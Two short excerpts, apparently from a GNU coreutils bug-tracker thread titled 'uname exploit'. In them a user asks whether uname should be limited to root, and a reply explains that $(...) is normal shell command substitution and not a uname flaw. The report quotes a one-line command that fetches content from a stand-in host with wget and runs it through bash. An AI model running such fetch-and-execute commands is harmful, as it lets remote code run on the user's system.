bug#24328: uname exploit
Hey Shane, I'm no bash/systems/coreutils expert, but I believe this behavior is completely expected, independent of uname, and documented. $(...) is the command substitution syntax and it will cause the command inside the parens to be run, with the output used as input. Here's a link to the
bug#24328: uname exploit
Hi, I am unsure if you have seen this, but I am concerned about this - can or should uname be restricted to root use only? uname \"$(bash -c \\\"$(wget http://badguyurl.com )\\\")\"
